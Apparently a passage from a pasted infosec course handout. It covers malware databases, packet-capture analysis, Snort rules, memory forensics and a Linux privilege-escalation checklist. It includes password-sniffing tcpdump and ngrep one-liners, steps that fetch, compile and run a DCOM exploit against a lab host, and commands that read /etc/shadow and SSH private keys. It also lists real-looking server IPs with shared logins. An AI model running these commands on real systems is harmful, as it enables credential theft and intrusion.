  1136. wget https://s3.amazonaws.com/infosecaddictsfiles/avsubmit.py
  1137. wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
  1138.  
  1139. unzip malware-password-is-infected.zip
  1140. infected
  1141.  
  1142. python avsubmit.py --init
  1143.  
  1144. python avsubmit.py -f malware.exe -e
  1145. -----------------------------------------------------------------------
  1146.  
  1147.  
  1148.  
  1149.  
  1150. Creating a malware database (mysql)
  1151. -----------------------------------
  1152. - Step 1: Installing MySQL database
  1153. - Run the following command in the terminal:
  1154. ---------------------------Type This-----------------------------------
  1155. sudo apt-get install mysql-server
  1156.  
  1157.  
  1158. - Step 2: Installing Python MySQLdb module
  1159. - Run the following command in the terminal:
  1160. ---------------------------Type This-----------------------------------
  1161. sudo apt-get build-dep python-mysqldb
  1162.  
  1163.  
  1164. sudo apt-get install python-mysqldb
  1165.  
  1166. -----------------------------------------------------------------------
  1167.  
  1168. Step 3: Logging in
  1169. Run the following command in the terminal:
  1170. ---------------------------Type This-----------------------------------
  1171. mysql -u root -p (set a password of 'malware')
  1172.  
  1173. - Then create one database by running following command:
  1174. ---------------------------Type This-----------------------------------
  1175. create database malware;
  1176.  
  1177. exit;
  1178.  
  1179. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1180.  
  1181. vi mal_to_db.py (fill in database connection information)
  1182.  
  1183. python mal_to_db.py -i
  1184. -----------------------------------------------------------------------
  1185.  
  1186. ------- check it to see if the files table was created ------
  1187.  
  1188. mysql -u root -p
  1189. malware
  1190.  
  1191. show databases;
  1192.  
  1193. use malware;
  1194.  
  1195. show tables;
  1196.  
  1197. describe files;
  1198.  
  1199. exit;
  1200.  
  1201. ---------------------------------
  1202.  
  1203.  
  1204. - Now add the malicious file to the DB
  1205. ---------------------------Type This-----------------------------------
  1206. python mal_to_db.py -f malware.exe -u
  1207. -----------------------------------------------------------------------
  1208.  
  1209.  
  1210. - Now check to see if it is in the DB
  1211. ---------------------------Type This-----------------------------------
  1212. mysql -u root -p
  1213. malware
  1214.  
  1215. mysql> use malware;
  1216.  
  1217. select id,md5,sha1,sha256,time FROM files;
  1218.  
  1219. mysql> quit;
  1220. ------------------------------------------------------------------------
  1221.  
  1222.  
  1223.  
  1224.  
  1225. #################
  1226. # PCAP Analysis #
  1227. #################
  1228. ---------------------------Type This-----------------------------------
  1229. cd ~/Desktop/
  1230.  
  1231. mkdir suspiciouspcap/
  1232.  
  1233. cd suspiciouspcap/
  1234.  
  1235. wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
  1236.  
  1237. wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
  1238.  
  1239.  
  1240. perl chaosreader.pl suspicious-time.pcap
  1241.  
  1242. firefox index.html
  1243.  
  1244. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1245.  
  1246. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1247.  
  1248.  
  1249. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1250. ------------------------------------------------------------------------
  1251.  
  1252.  
  1253.  
  1254. ####################
  1255. # Intro to TCPDump #
  1256. ####################
  1257. ---------------------------Type This-----------------------------------
  1258. sudo apt-get install tcpdump
  1259.  
  1260.  
  1261.  
  1262. Basic sniffing
  1263. --------------
  1264. ---------------------------Type This-----------------------------------
  1265. sudo tcpdump -n
  1266.  
  1267.  
  1268. Now lets increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy
  1269. ---------------------------Type This-----------------------------------
  1270. sudo tcpdump -v -n
  1271.  
  1272.  
  1273.  
  1274. Getting the ethernet header (link layer headers)
  1275. ------------------------------------------------
  1276. In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.
  1277. ---------------------------Type This-----------------------------------
  1278. sudo tcpdump -vv -n -e
  1279. ------------------------------------------------------------------------
  1280.  
  1281. Sniffing a particular interface
  1282. -------------------------------
  1283. In order to sniff a particular network interface we must specify it with the -i switch. First lets get the list of available interfaces using the -D switch.
  1284. ---------------------------Type This-----------------------------------
  1285. sudo tcpdump -D
  1286. ------------------------------------------------------------------------
  1287.  
  1288. Filtering packets using expressions - Selecting protocols
  1289. ---------------------------------------------------------
  1290. ---------------------------Type This-----------------------------------
  1291. $ sudo tcpdump -n tcp
  1292. ------------------------------------------------------------------------
  1293.  
  1294. Particular host or port
  1295. -----------------------
  1296. Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address 192.168.1.101
  1297. ---------------------------Type This-----------------------------------
  1298. $ sudo tcpdump -n 'src 192.168.1.101'
  1299. ------------------------------------------------------------------------
  1300.  
  1301. Next example picks up dns request packets, either those packets which originate from local machine and go to port 53 of some other machine.
  1302. ---------------------------Type This-----------------------------------
  1303. $ sudo tcpdump -n 'udp and dst port 53'
  1304. ------------------------------------------------------------------------
  1305.  
  1306. To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
  1307. ---------------------------Type This-----------------------------------
  1308. $ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
  1309. ------------------------------------------------------------------------
  1310.  
  1311. Search the network traffic using grep
  1312.  
  1313. Grep can be used along with tcpdump to search the network traffic. Here is a very simple example
  1314. ---------------------------Type This-----------------------------------
  1315. $ sudo tcpdump -n -A | grep -e 'POST'
  1316. ------------------------------------------------------------------------
  1317.  
  1318. So what is the idea behind searching packets. Well one good thing can be to sniff passwords.
  1319. Here is quick example to sniff passwords using egrep
  1320.  
  1321. ---------------------------Type This-----------------------------------
  1322. tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
  1323. ------------------------------------------------------------------------
  1324.  
  1325.  
  1326.  
  1327. #########
  1328. # NGrep #
  1329. #########
  1330.  
  1331. Install ngrep on Ubuntu
  1332. ---------------------------Type This-----------------------------------
  1333. $ sudo apt-get install ngrep
  1334. ------------------------------------------------------------------------
  1335.  
  1336. Search network traffic for string "User-Agent: "
  1337. ---------------------------Type This-----------------------------------
  1338. $ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
  1339. ------------------------------------------------------------------------
  1340. In the above command :
  1341. a) tcp and port 80 - is the bpf filter (Berkeley Packet Filter) , that sniffs only TCP packet with port number 80
  1342. b) The d option specifies the interface to sniff. eth0 in this case.
  1343. c) "User-Agent: " is the string to search for. All packets that have that string are displayed.
  1344.  
  1345. 2. Search network packets for GET or POST requests :
  1346. ---------------------------Type This-----------------------------------
  1347. $ sudo ngrep -l -q -d eth0 "^GET |^POST " tcp and port 80
  1348. ------------------------------------------------------------------------
  1349. The l option makes the output buffered and the q option is for quiet ( Be quiet; don't output any information other than packet headers and their payloads (if relevant) ).
  1350.  
  1351. 3. ngrep without any options would simply capture all packets.
  1352. ---------------------------Type This-----------------------------------
  1353. $ sudo ngrep
  1354. ------------------------------------------------------------------------
  1355.  
  1356. Reference:
  1357. https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
  1358. ---------------------------Type This-----------------------------------
  1359. $ sudo ngrep -d eth0 -n 3
  1360.  
  1361. $ sudo ngrep -d any port 25
  1362. ------------------------------------------------------------------------
  1363.  
  1364. This will let you monitor all activity crossing source or destination port 25
  1365. (SMTP).
  1366. ---------------------------Type This-----------------------------------
  1367. $ sudo ngrep -wi -d wlan0 'user|pass' port 6667
  1368.  
  1369. $ sudo ngrep -wi -d any 'user|pass' port 21
  1370. ------------------------------------------------------------------------
  1371.  
  1372.  
  1373.  
  1374.  
  1375.  
  1376. #############################
  1377. # PCAP Analysis with tshark #
  1378. #############################
  1379. ---------------------------Type This-----------------------------------
  1380. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  1381.  
  1382.  
  1383. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1384.  
  1385.  
  1386. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1387.  
  1388.  
  1389. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  1390.  
  1391.  
  1392. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
  1393.  
  1394.  
  1395. tshark -r suspicious-time.pcap -Y "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  1396.  
  1397. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  1398.  
  1399. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1400.  
  1401. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1402.  
  1403. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1404.  
  1405.  
  1406. whois rapidshare.com.eyu32.ru
  1407.  
  1408. whois sploitme.com.cn
  1409.  
  1410.  
  1411. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1412.  
  1413. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1414.  
  1415. tshark -r suspicious-time.pcap -qz http_req,tree
  1416.  
  1417. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1418.  
  1419. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1420.  
  1421.  
  1422.  
  1423. ######################################
  1424. # PCAP Analysis with forensicPCAP.py #
  1425. ######################################
  1426. ---------------------------Type This-----------------------------------
  1427. cd ~/Desktop/suspiciouspcap/
  1428.  
  1429. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1430.  
  1431. sudo pip install cmd2==0.7.9
  1432.  
  1433.  
  1434. python forensicPCAP.py suspicious-time.pcap
  1435. ------------------------------------------------------------------------
  1436.  
  1437.  
  1438. ---------------------------Type This-----------------------------------
  1439. ForPCAP >>> help
  1440. ------------------------------------------------------------------------
  1441.  
  1442. Prints stats about PCAP
  1443. ---------------------------Type This-----------------------------------
  1444. ForPCAP >>> stat
  1445. ------------------------------------------------------------------------
  1446.  
  1447. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1448. ---------------------------Type This-----------------------------------
  1449. ForPCAP >>> dns
  1450.  
  1451. ForPCAP >>> show
  1452. ------------------------------------------------------------------------
  1453.  
  1454. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1455. ---------------------------Type This-----------------------------------
  1456. ForPCAP >>> dstports
  1457.  
  1458. ForPCAP >>> show
  1459. ---------------------------Type This-----------------------------------
  1460.  
  1461. Prints the number of ip source and store them.
  1462. ---------------------------Type This-----------------------------------
  1463. ForPCAP >>> ipsrc
  1464.  
  1465. ForPCAP >>> show
  1466. ------------------------------------------------------------------------
  1467.  
  1468. Prints the number of web's requests and store them
  1469. ForPCAP >>> web
  1470.  
  1471. ForPCAP >>> show
  1472. ------------------------------------------------------------------------
  1473.  
  1474.  
  1475. Prints the number of mail's requests and store them
  1476. ---------------------------Type This-----------------------------------
  1477. ForPCAP >>> mail
  1478.  
  1479. ForPCAP >>> show
  1480. ------------------------------------------------------------------------
  1481.  
  1482.  
  1483.  
  1484.  
  1485.  
  1486. #############################
  1487. # Understanding Snort rules #
  1488. #############################
  1489. Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
  1490.  
  1491. Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
  1492.  
  1493. Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
  1494.  
  1495. Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  1496.  
  1497. Field 5: Traffic Direction (->)
  1498.  
  1499. Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
  1500.  
  1501. Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  1502.  
  1503. Field 8: MSG - what is actually displayed on the analysts machine
  1504.  
  1505.  
  1506. Let's look at 2 simple rules
  1507. ----------------------------------------------------------------------------------
  1508. alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
  1509. bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
  1510. content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
  1511. 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
  1512. reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
  1513.  
  1514. alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
  1515. attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
  1516. depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
  1517. 00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
  1518. distance:0; within:1; content:”|0b|”; distance:1; within:1; \
  1519. byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
  1520. 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
  1521. sid:2193; rev:1;)
  1522. ----------------------------------------------------------------------------------
  1523.  
  1524.  
  1525.  
  1526. From your Linux machine ping your Windows machine
  1527. ---------------------------Type This-----------------------------------
  1528. ping 192.168.11.1
  1529. -----------------------------------------------------------------------
  1530.  
  1531.  
  1532. Start wireshark and let's create some simple filters:
  1533.  
  1534. Filter 1:
  1535. ---------------------------Type This-----------------------------------
  1536. ip.addr==192.168.11.1
  1537. -----------------------------------------------------------------------
  1538.  
  1539. Filter 2:
  1540. ---------------------------Type This-----------------------------------
  1541. ip.addr==192.168.11.1 && icmp
  1542. -----------------------------------------------------------------------
  1543.  
  1544.  
  1545. Filter 3:
  1546. ---------------------------Type This-----------------------------------
  1547. ip.addr==192.168.11.1 && !(tcp.port==22)
  1548. -----------------------------------------------------------------------
  1549. Now stop your capture and restart it (make sure you keep the filter)
  1550.  
  1551.  
  1552.  
  1553.  
  1554. Back to your Linux machine:
  1555. [ CTRL-C ] - to stop your ping
  1556. ---------------------------Type This-----------------------------------
  1557. wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
  1558.  
  1559.  
  1560. gcc -o exploit oc192-dcom.c
  1561.  
  1562. ./exploit
  1563.  
  1564.  
  1565. ./exploit -d 192.168.11.1 -t 0
  1566. -----------------------------------------------------------------------
  1567.  
  1568.  
  1569.  
  1570. Now go back to WireShark and stop the capture.
  1571.  
  1572.  
  1573.  
  1574.  
  1575. ###################
  1576. # Memory Analysis #
  1577. ###################
  1578. ---------------------------Type This-----------------------------------
  1579. cd ~/Desktop/
  1580.  
  1581. sudo apt-get install -y foremost tcpxtract
  1582.  
  1583. wget https://s3.amazonaws.com/infosecaddictsfiles/hn_forensics.vmem
  1584.  
  1585. git clone https://github.com/volatilityfoundation/volatility.git
  1586.  
  1587. cd volatility
  1588. sudo pip install distorm3
  1589. sudo python setup.py install
  1590. python vol.py -h
  1591. python vol.py pslist -f ~/Desktop/hn_forensics.vmem
  1592. python vol.py connscan -f ~/Desktop/hn_forensics.vmem
  1593. mkdir dump/
  1594. mkdir -p output/pdf/
  1595. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 888 -D dump/
  1596. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 1752 -D dump/
  1597. ***Takes a few min***
  1598. strings 1752.dmp | grep "^http://" | sort | uniq
  1599. strings 1752.dmp | grep "Ahttps://" | uniq -u
  1600. cd ..
  1601. foremost -i ~/Desktop/volatility/dump/1752.dmp -t pdf -o output/pdf/
  1602. cd ~/Desktop/volatility/output/pdf/
  1603. cat audit.txt
  1604. cd pdf
  1605. ls
  1606. grep -i javascript *.pdf
  1607.  
  1608.  
  1609.  
  1610. cd ~/Desktop/volatility/output/pdf/
  1611. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  1612. unzip pdf-parser_V0_6_4.zip
  1613. python pdf-parser.py -s javascript --raw pdf/00601560.pdf
  1614. python pdf-parser.py --object 11 00600328.pdf
  1615. python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
  1616.  
  1617. cat malicious.js
  1618. -----------------------------------------------------------------------
  1619.  
  1620.  
  1621.  
  1622.  
  1623. *****Sorry - no time to cover javascript de-obfuscation today*****
  1624.  
  1625.  
  1626.  
  1627.  
  1628. ---------------------------Type This-----------------------------------
  1629. cd ~/Desktop/volatility
  1630. mkdir files2/
  1631. python vol.py -f ~/Desktop/hn_forensics.vmem dumpfiles -D files2/
  1632. python vol.py hivescan -f ~/Desktop/hn_forensics.vmem
  1633. python vol.py printkey -o 0xe1526748 -f ~/Desktop/hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  1634. -----------------------------------------------------------------------
  1635.  
  1636.  
  1637. ######################
  1638. ----------- ############### # Intro to Reversing # ############### -----------
  1639. ######################
  1640. Lab walk-through documents are in the zip file along with the executables that need to be reversed:
  1641. https://s3.amazonaws.com/infosecaddictsfiles/Lena151.zip
  1642.  
  1643.  
  1644.  
  1645.  
  1646.  
  1647. ##############################
  1648. # Linux For InfoSec Homework #
  1649. ##############################
  1650. In order to receive your certificate of attendance you must complete the all of the quizzes on the http://linuxsurvival.com/linux-tutorial-introduction/ website.
  1651.  
  1652.  
  1653. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Homework.docx)
  1654.  
  1655.  
  1656.  
  1657.  
  1658. ##############################
  1659. # Linux For InfoSe Challenge #
  1660. ##############################
  1661.  
  1662. In order to receive your certificate of proficiency you must complete all of the tasks covered in the Linux For InfoSec pastebin (http://pastebin.com/eduSfPy3).
  1663.  
  1664. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Challenge.docx)
  1665.  
  1666.  
  1667.  
  1668.  
  1669. IMPORTANT NOTE:
  1670. Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST.
  1671.  
  1672.  
  1673. #########################################################################
  1674. # What kind of Linux am I on and how can I find out? #
  1675. # Great reference: #
  1676. # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ #
  1677. #########################################################################
  1678. - What’s the distribution type? What version?
  1679. -------------------------------------------
  1680. cat /etc/issue
  1681. cat /etc/*-release
  1682. cat /etc/lsb-release # Debian based
  1683. cat /etc/redhat-release # Redhat based
  1684.  
  1685.  
  1686.  
  1687. - What’s the kernel version? Is it 64-bit?
  1688. -------------------------------------------
  1689. cat /proc/version
  1690. uname -a
  1691. uname -mrs
  1692. rpm -q kernel
  1693. dmesg | grep Linux
  1694. ls /boot | grep vmlinuz-
  1695.  
  1696.  
  1697.  
  1698. - What can be learnt from the environmental variables?
  1699. ----------------------------------------------------
  1700. cat /etc/profile
  1701. cat /etc/bashrc
  1702. cat ~/.bash_profile
  1703. cat ~/.bashrc
  1704. cat ~/.bash_logout
  1705. env
  1706. set
  1707.  
  1708.  
  1709. - What services are running? Which service has which user privilege?
  1710. ------------------------------------------------------------------
  1711. ps aux
  1712. ps -ef
  1713. top
  1714. cat /etc/services
  1715.  
  1716.  
  1717. - Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check!
  1718. ---------------------------------------------------------------------------------------------------------------
  1719. ps aux | grep root
  1720. ps -ef | grep root
  1721.  
  1722.  
  1723.  
  1724. - What applications are installed? What version are they? Are they currently running?
  1725. ------------------------------------------------------------------------------------
  1726. ls -alh /usr/bin/
  1727. ls -alh /sbin/
  1728. dpkg -l
  1729. rpm -qa
  1730. ls -alh /var/cache/apt/archivesO
  1731. ls -alh /var/cache/yum/
  1732.  
  1733.  
  1734. - Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
  1735. ------------------------------------------------------------------------------------
  1736. cat /etc/syslog.conf
  1737. cat /etc/chttp.conf
  1738. cat /etc/lighttpd.conf
  1739. cat /etc/cups/cupsd.conf
  1740. cat /etc/inetd.conf
  1741. cat /etc/apache2/apache2.conf
  1742. cat /etc/my.conf
  1743. cat /etc/httpd/conf/httpd.conf
  1744. cat /opt/lampp/etc/httpd.conf
  1745. ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
  1746.  
  1747.  
  1748.  
  1749. - What jobs are scheduled?
  1750. ------------------------
  1751. crontab -l
  1752. ls -alh /var/spool/cron
  1753. ls -al /etc/ | grep cron
  1754. ls -al /etc/cron*
  1755. cat /etc/cron*
  1756. cat /etc/at.allow
  1757. cat /etc/at.deny
  1758. cat /etc/cron.allow
  1759. cat /etc/cron.deny
  1760. cat /etc/crontab
  1761. cat /etc/anacrontab
  1762. cat /var/spool/cron/crontabs/root
  1763.  
  1764.  
  1765. - Any plain text usernames and/or passwords?
  1766. ------------------------------------------
  1767. grep -i user [filename]
  1768. grep -i pass [filename]
  1769. grep -C 5 "password" [filename]
  1770. find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Search for Joomla passwords
  1771.  
  1772.  
  1773. - What NIC(s) does the system have? Is it connected to another network?
  1774. ---------------------------------------------------------------------
  1775. /sbin/ifconfig -a
  1776. cat /etc/network/interfaces
  1777. cat /etc/sysconfig/network
  1778.  
  1779.  
  1780. - What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
  1781. ------------------------------------------------------------------------------------------------------------------------
  1782. cat /etc/resolv.conf
  1783. cat /etc/sysconfig/network
  1784. cat /etc/networks
  1785. iptables -L
  1786. hostname
  1787. dnsdomainname
  1788.  
  1789. - What other users & hosts are communicating with the system?
  1790. -----------------------------------------------------------
  1791. lsof -i
  1792. lsof -i :80
  1793. grep 80 /etc/services
  1794. netstat -antup
  1795. netstat -antpx
  1796. netstat -tulpn
  1797. chkconfig --list
  1798. chkconfig --list | grep 3:on
  1799. last
  1800. w
  1801.  
  1802.  
  1803.  
  1804. - Whats cached? IP and/or MAC addresses
  1805. -------------------------------------
  1806. arp -e
  1807. route
  1808. /sbin/route -nee
  1809.  
  1810.  
  1811. - Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
  1812. ------------------------------------------------------------------------------------------
  1813. id
  1814. who
  1815. w
  1816. last
  1817. cat /etc/passwd | cut -d: -f1 # List of users
  1818. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
  1819. awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
  1820. cat /etc/sudoers
  1821. sudo -l
  1822.  
  1823.  
  1824.  
  1825. - What sensitive files can be found?
  1826. ----------------------------------
  1827. cat /etc/passwd
  1828. cat /etc/group
  1829. cat /etc/shadow
  1830. ls -alh /var/mail/
  1831.  
  1832.  
  1833.  
  1834. - Anything “interesting” in the home directorie(s)? If it’s possible to access
  1835. ----------------------------------------------------------------------------
  1836. ls -ahlR /root/
  1837. ls -ahlR /home/
  1838.  
  1839.  
  1840. - Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
  1841. ---------------------------------------------------------------------------------------------------------------------------
  1842. cat /var/apache2/config.inc
  1843. cat /var/lib/mysql/mysql/user.MYD
  1844. cat /root/anaconda-ks.cfg
  1845.  
  1846.  
  1847. - What has the user being doing? Is there any password in plain text? What have they been edting?
  1848. -----------------------------------------------------------------------------------------------
  1849. cat ~/.bash_history
  1850. cat ~/.nano_history
  1851. cat ~/.atftp_history
  1852. cat ~/.mysql_history
  1853. cat ~/.php_history
  1854.  
  1855.  
  1856.  
  1857. - What user information can be found?
  1858. -----------------------------------
  1859. cat ~/.bashrc
  1860. cat ~/.profile
  1861. cat /var/mail/root
  1862. cat /var/spool/mail/root
  1863.  
  1864.  
  1865. - Can private-key information be found?
  1866. -------------------------------------
  1867. cat ~/.ssh/authorized_keys
  1868. cat ~/.ssh/identity.pub
  1869. cat ~/.ssh/identity
  1870. cat ~/.ssh/id_rsa.pub
  1871. cat ~/.ssh/id_rsa
  1872. cat ~/.ssh/id_dsa.pub
  1873. cat ~/.ssh/id_dsa
  1874. cat /etc/ssh/ssh_config
  1875. cat /etc/ssh/sshd_config
  1876. cat /etc/ssh/ssh_host_dsa_key.pub
  1877. cat /etc/ssh/ssh_host_dsa_key
  1878. cat /etc/ssh/ssh_host_rsa_key.pub
  1879. cat /etc/ssh/ssh_host_rsa_key
  1880. cat /etc/ssh/ssh_host_key.pub
  1881. cat /etc/ssh/ssh_host_key
  1882.  
  1883.  
  1884. - Any settings/files (hidden) on website? Any settings file with database information?
  1885. ------------------------------------------------------------------------------------
  1886. ls -alhR /var/www/
  1887. ls -alhR /srv/www/htdocs/
  1888. ls -alhR /usr/local/www/apache22/data/
  1889. ls -alhR /opt/lampp/htdocs/
  1890. ls -alhR /var/www/html/
  1891.  
  1892.  
  1893. - Is there anything in the log file(s) (Could help with “Local File Includes”!)
  1894. -----------------------------------------------------------------------------
  1895. cat /etc/httpd/logs/access_log
  1896. cat /etc/httpd/logs/access.log
  1897. cat /etc/httpd/logs/error_log
  1898. cat /etc/httpd/logs/error.log
  1899. cat /var/log/apache2/access_log
  1900. cat /var/log/apache2/access.log
  1901. cat /var/log/apache2/error_log
  1902. cat /var/log/apache2/error.log
  1903. cat /var/log/apache/access_log
  1904. cat /var/log/apache/access.log
  1905. cat /var/log/auth.log
  1906. cat /var/log/chttp.log
  1907. cat /var/log/cups/error_log
  1908. cat /var/log/dpkg.log
  1909. cat /var/log/faillog
  1910. cat /var/log/httpd/access_log
  1911. cat /var/log/httpd/access.log
  1912. cat /var/log/httpd/error_log
  1913. cat /var/log/httpd/error.log
  1914. cat /var/log/lastlog
  1915. cat /var/log/lighttpd/access.log
  1916. cat /var/log/lighttpd/error.log
  1917. cat /var/log/lighttpd/lighttpd.access.log
  1918. cat /var/log/lighttpd/lighttpd.error.log
  1919. cat /var/log/messages
  1920. cat /var/log/secure
  1921. cat /var/log/syslog
  1922. cat /var/log/wtmp
  1923. cat /var/log/xferlog
  1924. cat /var/log/yum.log
  1925. cat /var/run/utmp
  1926. cat /var/webmin/miniserv.log
  1927. cat /var/www/logs/access_log
  1928. cat /var/www/logs/access.log
  1929. ls -alh /var/lib/dhcp3/
  1930. ls -alh /var/log/postgresql/
  1931. ls -alh /var/log/proftpd/
  1932. ls -alh /var/log/samba/
  1933.  
  1934. - Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
  1935.  
  1936.  
  1937.  
  1938.  
  1939.  
  1940. ########################################################################################################################################
  1941.  
  1942.  
  1943.  
  1944.  
  1945.  
  1946. ####################################
  1947. # Day 2: Building a Perfect Server #
  1948. ####################################
  1949. -------------------------------------------
  1950. Task 1: Log in to your respective Linux server
  1951. PMRF1 (Hugo/Ross)
  1952. 45.76.61.100
  1953. pmrf aegisashore
  1954.  
  1955. PMRF2 (steve/jeff)
  1956. 155.138.213.248
  1957. pmrf aegisashore
  1958.  
  1959.  
  1960. PMRF3 (elaine)
  1961. 155.138.198.202
  1962. pmrf aegisashore
  1963.  
  1964.  
  1965.  
  1966. Task 2: Build the Perfect Server
  1967. https://www.howtoforge.com/tutorial/perfect-server-centos-7-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/
  1968.  
  1969. Important notes:
  1970. Steps to skip
  1971. skip all of step 1
  1972. skip all of step 2
  1973. skip all of step 3
  1974. skip all of step 5
  1975.  
  1976. Important notes:
  1977. step 11 amavisd may not work. If it doesn't work just keep moving forward
  1978. ---------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement